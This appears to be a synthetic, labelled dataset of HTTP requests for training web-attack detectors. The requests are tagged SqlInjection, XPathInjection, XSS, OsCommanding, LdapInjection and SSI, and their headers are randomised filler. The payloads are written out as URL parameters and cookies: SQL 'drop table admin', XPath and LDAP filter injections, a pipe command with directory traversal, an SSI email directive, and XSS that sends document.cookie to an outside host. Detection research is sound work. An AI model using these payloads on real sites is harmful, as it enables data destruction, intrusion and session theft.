GET /orhtd/mSD7-2@FxpjU4k/fQNRGMjOl/9ehslsol/1tqwntoe.shtml?otelbqtalaH=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: www.Wrpnsv.de
Connection: keep-alive
Accept: video/mpeg;q=0.6, video/*;q=0.1, video/*;q=0.9
Accept-Charset: euc-jp;q=0.6, euc-kr;q=0.3, windows-1250;q=0.9
Accept-Encoding: *
Accept-Language: rhRal-osoon;q=0.2, Flhtz-i3;q=0.8, nenmhe-iiab, enua-rhlkmie;q=0.8, sroc-3
Cache-Control: only-if-cached
Client-ip: 126.45.36.156
Cookie: knLlooep9ba4Aft=6e;dnxtaxnhinzmoPt=nsXy
Cookie2: $Version="308"
Date: Mon, 03 Nov 08 22:13:14 UTC
ETag: "-A3q_0z5h0Y@AJr8"
Expect: 100-continue
From: nitnd0Ry@sdsmmyeanh.ch
If-Modified-Since: Thu, 06 Dec 07 10:11:44 CET
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: "o5j26.LaMUfb9Pnf-Yz"
If-None-Match: "M.Ies..hvhPqNc8Ne9K"
If-Range: Tue, 27 Mar 07 04:14:38 UTC
Max-Forwards: 00
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: NTLM ZlNuZWUxaGE4cnJuaHBlQXJsZWVpb3RvZlVpNXFlY0VpaWFwbmU=
Range: -07524
Referer: /t7i7/utPw/faecwth.mdb
TE: trailers,deflate,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.8 (X11; U; Open BSD i386 1.0; ha-1V; rv:4.2.8) Gecko/19294086
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 162x589
Via: ewgomt/6.2 www.mkltARel.htm, 8.3 www.1tngt.js, 1dhu/4.0 www.sfex.html
Transfer-Encoding: compress
Upgrade: Elhojr/2.6, ocoxo/3.7, here8i/5.4
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39432
Start - Id: 41788
class: SqlInjection
GET /ouqcfqsmufc6yer7b/m9.DfqdmVRs/nnzrmsod/u1n/e1DRBu/h5Q@K3SBryL.gif?iiEmO6hm=6501675&eShaTlq=e%25selectchome%3Brnle%27NraBpositionn&QKt9=otcaft&wtlnfkuxni=2847&wp-gdvlD=esj&y4Yd=%27%3B++++drop+++++table+++++admin HTTP/1.1
Host: 238.46.33.50
Connection: Enhh
Accept: */*;q=0.9
Accept-Charset: windows-1258
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 112.56.209.56
Cookie: ettsealtd7ire= hrq;iperlbp1b.=ecaH0
Cookie2: $Version="3"
Date: Fri, 27 Mar 09 17:18:42 CET
ETag: ".4g273Gu0e1YegQr"
Expect: e813nRi=Rjetwieo;hsuvez=0ens
From: nIeior@tiriRlyas.net
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Thu, 08 Sep 05 18:18:55 GMT
If-Match: "8Pum.frRG9Mt@OdzqDl"
If-None-Match: "EPch6cTst6aE8s6O8W"
If-Range: Wed, 25 May 05 13:40:47 GMT
Max-Forwards: 1
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: nkoe63 beoeYB=Norx
Range: -47,-6912
Referer: http://i4ow.uk/eauHtsnr/Euney/nn3e.jpeg
TE: gzip,trailers,deflate;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/9.2 (X11; U; Open BSD i386 4.9; 8Y-ho; rv:9.6.0) Gecko/12217947
UA-CPU: x86
UA-Disp: 4110,3651,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: identity
Upgrade: ooo/9.2, 8pcmnn/1.5
Warning: 328 www.aeePtha.gif "090pevlaxa3e8csta7a" "Fri, 15 Sep 06 14:42:50 UTC"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41788
Start - Id: 49461
class: XPathInjection
GET /9rwneeea6if35pN/tz1yujsaifEEsHttdno/aktXZgc8PWESbC/cxR/Sib0eIuztTfd15Te/6Y3o.nsf?oPer7trwfiirn=saotnEeaooie6t&cx=t8rdateg%27++or+++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28++++i++++%2Bj++%2B+k+++%2B++++l+++%2B+1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++%27rieetif%27%3D++%27+++helshNe%27+++++or&eswphhow6idxov=eoeyc&apa8nsdeg=idwtT&wCxZPuginputJ=jqrG&t4non7=53872472&7eIr1rpteio=y5jeFnW6gO&m3admincexecCV=2987321&nesM=ei&tfituhe=a&nhxc=E8ehttpeIudsamnono9&iDqDa=zwdenumnc0uEawtos HTTP/1.1
Host: www.Ei7iseaNr.org
Connection: tfdzb
Accept: video/*;q=0.3, audio/basic;q=0.9, application/zip;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: compress
Accept-Language: urd-8O, iSnhnLyb-fu, Reedtbl-w
Cache-Control: no-store
Client-ip: 189.208.211.40
Cookie: rnefsarctnve=nOnMe;Bzupdaten=nac;hAdetwvel=e60HLsfgZ;T2dtiDerreN=oZ_J6GPpjVHc;tTe1e=y~t5;WbLcm0_1V7=mMmi
Cookie2: $Version="182"
Date: Tue, 12 Apr 05 02:56:21 GMT
ETag: W/"RvhtSSeefa@GeYDYZ."
Expect: POes=p4aun;djhEbu=gsoao
From: n5thibdN@srSdAet.st
If-Modified-Since: Sat, 02 Aug 08 16:51:30 GMT
If-Unmodified-Since: Sun, 13 Dec 09 23:43:14 UTC
If-Match: *
If-None-Match: *
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 52
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nc=6E3c630e
Range: -012
Referer: http://o7arie.uk/nlotjto6/oo0ip4eo/cGgoaz/sca9s/6lAue5sr.mpeg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.2 (X11; U; Unix 9.8; or-t6; rv:3.6.9) Gecko/96478076
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 527x1451
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: gzip
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 16.113.150.28
X-Serial-Number: 812184590933752195
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49461
Start - Id: 47937
class: XSS
GET /5apfDqnetcatr6AD.kas/i0a0nvictre3os/Eey/zts2HEomem1nl9d.htm?ngbsoenph=esol&olwsueoZtroEc=cklrWm&1hEnrwMouebafs8=4473024&etsrfeeeda=Awinnt&2Enimahhkt=%3Cimg+++dynsrc+%3D++%22+++javascript%3A++%5Balert+%28%27aecie%27%29%3B%5D+++%22++%3E&ZJyD-uSfromS91-=l2M&ll2IaninCr=iRheturra HTTP/1.1
Host: 213.238.184.73:80
Connection: close
Accept: image/gif;q=0.1, text/xml;q=0.1
Accept-Charset: iso-8859-8, x-mac-japanese, utf-8;q=0.7, x-mac-arabic;q=0.1, windows-1250
Accept-Encoding: identity, deflate;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 99.239.86.40
Cookie: oek2jwtetpxq=oipwau;yiair1=e;F4yX=1;tmqqdeittreteea=ep)i;ceemocacd5Dzuaq=vcps dwinnta5 /jbpe?u9ej;evu1C@Gz5telnet2= ostyle1
Cookie2: $Version="613"
Date: Fri, 01 Jul 05 19:08:03 GMT
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Sat, 11 Mar 06 13:23:55 UTC
If-Unmodified-Since: Tue, 06 Jun 06 23:18:59 CET
If-Match: *
If-None-Match: *
If-Range: "dui5KMZulNUq4Bq8v7vG"
Max-Forwards: 140
MIME-Version: 2.0
Pragma: doeu='AuE6ie'
Proxy-Authorization: Digest response="D2c62646bFC00e6b27eFfb05278ad0eb"
Authorization: Basic ZGEydGZ1ODpydWxnYXV5
Range: 986919-,798-764614
Referer: http://www.Qaee.be/hOcrns/7wrsm3it/aeenpeMo.msf
TE: trailers,trailers,gzip;q=0.3
Trailer: Max-Forwards
User-Agent: Mozilla/6.7 (X11; U; Unix 6.8; tu-as; rv:2.9.9) Gecko/98430398
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 929x206
Via: casA3e/9.5 www.eafpos.jpg, 6.6 87.216.24.52
Transfer-Encoding: fL6YG
Upgrade: revs/4.9
Warning: 608 117.63.178.23 "ioeihi" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47937
Start - Id: 42552
class: SqlInjection
GET /Rl.@VYmlib6W/mpHvnMmypdLEEEI/ogeeZnaueiobvGoaso/hp/aU9locuuotkwIpvrntoa/s-jpl/tabneixscAPrn.html?mZo5otAdrpuerm=%27%3B++++insert+++++into++++tedtUs50+++++values%28666%2C%27sfurtSb%27%2C%27rru%27%2C0xfffff%29&sohio170wlGr=luetcr%254tcta+%2Fhttpsinserth%27o HTTP/1.0
Host: www.he8k.de:80
Connection: 7iOnoob
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 63.14.152.225
Cookie: BAbotorI=sQ0-c2aI8;lasakteprgsws=tgfprocessing-instruction4nwhtsi9fj;ywzexh1ot5oo7=34
Cookie2: $Version="597"
Date: Mon, 18 Oct 04 05:51:20 UTC
ETag: W/"LEVaDfsyAKfrIXNnW"
Expect: 100-continue
From: ecsnelg0@jkwTHolpio.fr
If-Modified-Since: Fri, 21 Sep 07 06:12:33 UTC
If-Unmodified-Since: Fri, 24 Dec 04 18:24:18 CET
If-Match: *
If-None-Match: "gIpsjGeRUFY.ZzAqf"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 3
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: -23041,40-95155,61918-
Referer: http://www.apanm.gov/Yaayg/eosooe.php
TE: trailers,gzip;q=0.8
Trailer: Upgrade
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 5.4; er-om; rv:5.0.9) Gecko/58447204
UA-CPU: x86
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: FTP/3.6 www.ecEnrj.js
Transfer-Encoding: compress
Upgrade: i5oae/7.4
Warning: 630 www.a0shtex.tiff "wilAeNfut" "Fri, 18 Nov 05 04:48:10 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42552
Start - Id: 44267
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 97.247.131.117
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Pma-sh
Cache-Control: max-age=834
Client-ip: 225.50.172.247
Cookie: istTyrtPe=629;miheazelr=836;mgnc.3U=60;0ennidhshek=h1LVrge;yecld2i=26140631;eea5et0gu=ihdsdAt24veie
Cookie2: $Version="544"
Date: Thu, 22 Nov 07 14:37:37 GMT
ETag: W/"JQx0uHTwXQsPyN32k.C"
Expect: 100-continue
From: Ce9h0dvt@naeheOu.st
If-Modified-Since: Mon, 19 Sep 05 05:53:20 GMT
If-Unmodified-Since: Fri, 07 Apr 06 21:48:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 139
MIME-Version: 4.2
Pragma: at7b='e'
Proxy-Authorization: NTLM VGxycmhjbG53cjdsc0Z0aWVuaGl0bmVib2lhZWk3U2ljYXZ4bnNpb2JybG0=
Authorization: Digest algorithm=osHre
Range: 1630-9,-816
Referer: /taiel8/dynmNmw/tcns.php3
TE: gzip;q=0.0,chunked,deflate
Trailer: Referer
User-Agent: CeIad (7KHZm9xM; aAUvHKYsZK; eG3hU67J.; 2oXdLyM4A; e2qaz6)
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7064x6561
Via: pyg/2.1 28.30.25.143, 9.2 www.eNrtD.jpg
Transfer-Encoding: gzip
Upgrade: ytc/5.0, mosem/3.9
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44267
Start - Id: 50099
class: XPathInjection
POST /geJwL9Z/uhaeefg/emugeSwcItyEayae42/eastbLnssep/b4J3I/e4SQZTur2WHCP1Ts/hQsWlXaZYHc57rYQJLV/slKdVtl7LfWZ05JLa/nEvkWmEY@Jzdmu@c9.mspx? HTTP/1.1
Content-Length: 56
Content-Language: nwhiTi5n
Content-Encoding: gzip
Content-Location: http://l0srltex.cz/cegue.php
Content-MD5: dG53ZmNheWx0ZmVyYWhlbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Feb 10 18:54:43 UTC
Last-Modified: Sun, 04 Apr 04 21:48:35 UTC
Host: www.swz3epas.st
Connection: 3ser
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: rCa-kAO, a1hTt5-sfWr, dgitub-ai;q=0.1
Cache-Control: min-fresh=05458
Client-ip: 190.90.78.212
Cookie: 6o=sewe];5edxeraoaUenes8=29182218;leeam0oanmnmnI=dUI;WeGtarmaSYRH=96426875;ecgeetUuFsr0itm=terricR'   or 6   <   count(path/child::*)    or  'nHnh'=  ';VicvHM=712
Cookie2: $Version="68"
Date: Tue, 08 Sep 09 24:32:58 CET
ETag: W/"oVGxOXRSDXIVS2DmUS"
Expect: cnimr
From: sg4eHiz@plotai.gov
If-Modified-Since: Wed, 13 Apr 05 13:51:13 UTC
If-Unmodified-Since: Sat, 09 Feb 08 02:24:13 GMT
If-Match: *
If-None-Match: "Vlyqvic454zroln_qb"
If-Range: Fri, 18 Mar 05 19:30:54 UTC
Max-Forwards: 8
MIME-Version: 7.3
Pragma: ntI='dtouc2y'
Proxy-Authorization: NTLM aWRpc0hhbk9uZWRkcGllZXNpUmY1YWxrYW9pb2RNdGRzbXNvZUhjeWV0RHRlZUM=
Authorization: NTLM bHR0ZVJlT2V5c2VlWm91aXd5MXQ5MWRCbkFzNGNvb2NubWJleWhlRmlwc3Nh
Range: -7620
Referer: http://www.ysrykc.it/BqVhreio/tds13het.exe
TE: chunked;q=0.2,deflate;q=0.3
Trailer: If-None-Match
User-Agent: Mozilla/4.0 (X11; U; Linux i386 7.2; Hs-i2; rv:3.9.6) Gecko/43733469
UA-Color: color32
Via: HTTP/8.1 www.etnxe.gif
Transfer-Encoding: compress
Upgrade: tnneIh/3.3, sWf/3.2, dt7pet/7.2, mAzn/5.8
Warning: 186 www.faE0p.gif "mo4rea" 
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

V8ftpfNgd_=784645&r8tebtl2=nV4i&tqaunllow= eo=&ldp=ioa

End - Id: 50099
Start - Id: 37177
class: LdapInjection
GET /lTHl1uXZS@P/hf4/8nnadefhabsezhgTt/byOlU9NW/eciilxdrpehigne/AAW.-c4btz.cfm?snileeft=185613082&X59mailsnF=nle&ge9atnghtcteopy=n+yosock_streamktelrdM&tf=89Ldrayvfn0emhn&GV3_MAF=%7Cns&ilw=9tnajeaadminnesh&Tchskfao=%29+%28+%7C++++%28cn%3D*o%27brien*++%29%28mail%3D*o++++%27brien*++++%29&wtm=ymv1mnsaxj&mtG=%26ngtNn&soet6eka0lwStna=ezlc&mEhzYea2=cJoi2passwdmn8ts HTTP/1.1
Host: www.cxrntabne.biz
Connection: HoadT
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: gzip
Accept-Language: ath-e4qh;q=0.6, edi-eer, lscoisit-mh, an6-ziebs, 3rhA-rrtrgbho
Cache-Control: no-cache
Client-ip: 105.61.31.124
Cookie: itHDspcrdafb=zsl
Cookie2: $Version="5"
Date: Sun, 10 Sep 06 02:06:03 UTC
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: 100-continue
From: aheoexc5@cnna.gov
If-Modified-Since: Sat, 11 Dec 04 09:30:21 CET
If-Unmodified-Since: Tue, 31 Oct 06 23:18:48 UTC
If-Match: *
If-None-Match: "WQ_-1Hx2FOdPcyy03L"
If-Range: "Z4G3T@eRECE7Qfy"
Max-Forwards: 77
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic YW90bmE6ZW16MnBhbg==
Authorization: Digest nonce
Range: 0-
Referer: /8yY7p/osri/xntfed/8Aonw/ztgCi.mdb
TE: deflate,deflate,chunked;q=0.8
Trailer: Via
User-Agent: oUVsvUuks http://www.saEs4ul.cz
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 5.1 www.ne2sm9oh.html, 6.5 www.ngxis.htm, YOsv/2.9 www.htHA.htm
Transfer-Encoding: deflate
Upgrade: Tri/4.5
Warning: 662 www.decsE.html "thSoIrea" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 175208593
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37177
Start - Id: 49473
class: XPathInjection
GET /Up-/pVk8-SIbsIa7g1ERvRR/UrEycsi5rc/eslke1ydT1/bf.pl?sghA=9tg%27+or++6++++%3C+count%28path%2Fchild%3A%3A*%29+++++or++++%27aiurp%27++++%3D++%27&l-rBLIWgT2QH=zxlv5&hte=8y&tn2hsmom=r HTTP/1.1
Host: 4.92.54.206:80
Connection: NCc5
Accept: */*;q=0.9
Accept-Charset: iso-10646-ucs-2, isiri-3342, cp-950;q=0.8, shift_jis;q=0.4, ks_c_5601-1987;q=0.6
Accept-Encoding: 
Accept-Language: urudni7-dtofezd, Seu0a-rr, a5-d;q=0.8
Cache-Control: max-age=27
Client-ip: 19.179.52.141
Cookie: rtoontte=l0d1reti3vomeuarr;dOe=qWC;rt=bhtpass=efnri
Cookie2: $Version="4"
Date: Tue, 24 Feb 09 07:28:45 CET
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: 8tns@scEoyunm.org
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Thu, 16 Aug 07 12:35:10 GMT
If-Match: *
If-None-Match: "iYRMho8Dej1gSwy"
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 5
MIME-Version: 2.1
Pragma: e=uet
Proxy-Authorization: so9ts otea6n=hdva
Authorization: Digest nonce
Range: -012
Referer: /jtaa/phosNeb.pl
TE: trailers,gzip;q=0.2
Trailer: Cache-Control
User-Agent: sEnuoipft/3.8
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: 7.8 www.snxjsone.shtml, FTP/4.9 www.en7ieCVe.html, 3.3 206.21.178.194
Transfer-Encoding: compress
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 811 www.h0iseed.jpg "Eayaooe2bzy9a" "Fri, 24 Nov 06 06:59:07 UTC"
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 008046
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49473
Start - Id: 47296
class: XSS
GET /fr/DpagFmFvyK3DscriptAvbscript/sWt2rfya6trttntpn/hYByO-38t/hWwA1JwMQ8Hh1F99Y/h9AcBB2eJQP6/b6@NPIei9Wn/afsuIsdrEostCgA71F.asp?connectmaccess_logaeDFG0N=-ally&AuTs=91099&XNP0=18&5jeoets=%3Ciframe+src++++%3D+++%22+vbscript%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.asinmeve.com%2Fcgi-bin%2Fitti.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E&etW0uunreldEtsm=ejhrt+%7C HTTP/1.1
Host: www.tteh.cz
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 159.5.195.74
Cookie: siia1ue4fpIi=14;Ooiaowsn=mo4gbtriatF HMici;5@n1rc=43Fdf;nenbnlih3ntxR=oief;VncallUQvarMSt=eiyrVlhoxX09
Cookie2: $Version="1"
Date: Sat, 09 Dec 06 04:52:25 UTC
ETag: "XjJvcVzPg2kiAhQYG2q"
Expect: oTTAtodr=ae13
From: etiosA@ol5yehtiwE.org
If-Modified-Since: Wed, 12 Dec 07 13:55:35 GMT
If-Unmodified-Since: Thu, 13 Mar 08 16:58:42 GMT
If-Match: *
If-None-Match: "0F091VtTg8z.g_oXt"
If-Range: Fri, 11 Mar 05 15:25:06 UTC
Max-Forwards: 059
MIME-Version: 1.9
Pragma: lrs9et=yr0Ioh
Proxy-Authorization: Digest realm
Authorization: rjne svdhj5us=dhtnra
Range: -4,7256-5,39-5314
Referer: /uelUa/nnu0hn/aoAsim/ocfyn.png
TE: trailers,trailers,deflate;q=0.9
Trailer: User-Agent
User-Agent: payemwoesrrksnaeuet
UA-CPU: Sparc
UA-Disp: 7412,103,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5306x1733
Via: 5.3 10.250.186.184, FTP/5.4 129.12.128.189
Transfer-Encoding: fidgsl; eoardf=8nny
Upgrade: 8iiKe/2.0, iiEe/4.6, ywedbe/9.1, aapo/1.4, Pjtu/9.8
Warning: 299 www.leto.html "eaiemdnssbtcpoo5ntb" "Fri, 25 Aug 06 10:41:44 GMT"
X-Forwarded-For: 7.96.3.255
X-Serial-Number: 1360027
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47296
Start - Id: 49318
class: XPathInjection
GET /vcVwiS-I-aZuqrzsMph/aK0bAw/eEd/d578/cihbtr6uuhlam/2OelnK/wxg9rYB0J/Tupdate7cpaILPUU5/hoN/akr8yoozntn2suiw.dll?de=kgi08%2Fon%2Fe%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D87%5D++or++%27rys3%27%3D++++%27&BhPKZ2meta=891&2in6eeioLe=4 HTTP/1.0
Host: 179.72.49.172
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress, identity, identity;q=0.1, deflate;q=0.2
Accept-Language: u2-etRi;q=0.4, aht4-I;q=0.1, hdoxfr-taeze;q=0.2, ress5n-Ecs, 0A9z-0o;q=0.5
Cache-Control: only-if-cached
Client-ip: 66.86.201.155
Cookie: 9xteIw=846177751;ieafesz8ye=u3uhome7%iHtodocumentL[oj3ms;acezehu=ciAgw@
Cookie2: $Version="4"
Date: Tue, 21 Apr 09 09:01:24 UTC
ETag: "nQHcadU1EvgfeIQ"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Mon, 20 Oct 08 21:27:24 CET
If-Unmodified-Since: Sat, 15 Nov 08 07:42:46 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 50
MIME-Version: 7.2
Pragma: ele='htro'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: 6rts7i fsehur=hewya
Range: 28823-,87212-
Referer: http://www.toe7onam.net/2nai6wse/ogIsnb9e/z6le2ee/a5hree/yhrtI.jpg
TE: trailers,gzip,gzip;q=0.5
Trailer: Accept
User-Agent: Mozilla/4.1 (Machintosh; U; Mac OS X 8.0; 0d-es; rv:1.3.8) Gecko/72878972
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: FTP/6.8 www.NeRfyr.png, 9.5 www.pelt.tiff
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 970 91.193.19.21 "6desenmdo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 09521
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49318
Start - Id: 39438
class: SSI
GET /hC.XSsWAf/oZuVnlfisiQBSu/lzdeehdne/L@Fkp_itD/tl7d_wIlu/y4group bys8GT.exe?lHgs4oo9=BettpTld4tT&c8u=%3C%21--%23email+fromhost%3D%22www.rtsa9mle.com%22+tohost%3D%22mailbox.mod.com%22+message%3D%22omi0iv+D2eTsu+hyyp+es2%22+fromaddress%3D%223Baa.com%22+toaddress%3D%22ojE.qv.com%22+subject%3D%222%22+sender%3D%22os.com%22+replyto%3D%22iyspaI.com%22+cc%3D%22ne%22+inreplyto%3D%22hgsg+smx+tsbowq%22+id%3D%22Hemail%22+--%3E&wopXUmlzru8o=d4ljdgj&enoT=nro%24fl%2Fyhher4s HTTP/1.1
Host: www.eumNs.ch
Connection: close
Accept: image/gif;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: nhgwbw=sn8ooS4
Client-ip: 69.64.197.144
Cookie: ksZLQo@L0Z7=4e+ie'eeifguilinput4Som;idrdeCp=i;Yitgmhzo=06791502
Cookie2: $Version="308"
Date: Mon, 15 Jan 07 23:47:55 GMT
ETag: W/"JVqyQgA0PLhI.NY2AP"
Expect: 100-continue
From: 1y6tgnnt@o4or4ie9a.com
If-Modified-Since: Thu, 06 Dec 07 10:11:44 CET
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: *
If-None-Match: *
If-Range: "VME@8FxxahI92mwwUeN"
Max-Forwards: 751
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: rashN riiam=cssstki
Authorization: Lmeeh zrll=ad9eahiy
Range: 73-4339,804-,5553-97644
Referer: http://eDee.uk/e9s3ujho.swf
TE: gzip;q=0.9,trailers,deflate;q=0.7
Trailer: Authorization
User-Agent: 7d5eurnahoiwaie
UA-CPU: PowerPC
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 162x589
Via: 9.4 64.91.206.115
Transfer-Encoding: gzip
Upgrade: r94e/0.1, hme/5.5, ammrcS/1.0, aznO/2.8
Warning: 428 www.oheYza.htm "hrtat8k" "Sat, 01 Oct 05 21:42:07 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39438
Start - Id: 38586
class: LdapInjection
GET /UAMpTjPTNtZEr/mw/nntwG1ee7i/3L1OsystemohTeV0dA8replace/SlotelnetLwjLWySz/oTGJfzQEq8nmV7LWLXzj/tnf/4vw1x-DL.vY-Z64h4/nhaoldoRnset6/8l/ttum.mdb?ftpocl=mnr0tf&fvLin=aro&snuidno1sler=7&rnaLAEefro=dhhs&elctt5cCamog=091305&eEqeusj=RBgroup+byusrUrehxp_1i6e&hHTXtDXIM=2665%29%28%26%28objectClass%3Deae%29%28%7C%28sn++%3D+++ect%29%28cn%3Dq+++++J*%29%29&deHhhoo=15&JDkBna-Q.UCJ=azd353Yt&KK8kTpe=eo%26+rsSwrftnrrNo+&ovicfFoCte=nkhmTee+yatTem&inx=iw6etp%5DOweRsTs&nu4oh1Se2sr=lale&0didap7=ttP HTTP/1.1
Host: www.oaniiiaM.it
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: cp-936;q=0.7, windows-1257;q=0.7, x-mac-japanese, hz-gb-2312, shift_jis
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=24
Client-ip: 41.219.136.17
Cookie: ny0uloro=eaetisndto2rtenn;oa6Ie1=2iB8_S;emya=1651213
Cookie2: $Version="7"
Date: Wed, 03 Jan 07 04:37:29 UTC
ETag: W/"6nZZgYbWyGMuFSgPS"
Expect: 100-continue
From: pyIBk@eedSVf1mn.cz
If-Modified-Since: Thu, 29 Jan 04 05:22:33 CET
If-Unmodified-Since: Thu, 15 Jan 04 11:46:10 GMT
If-Match: "yQrgc8kEKG2IWS1sTnse"
If-None-Match: *
If-Range: Tue, 03 Jun 08 04:02:42 GMT
Max-Forwards: 6534
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
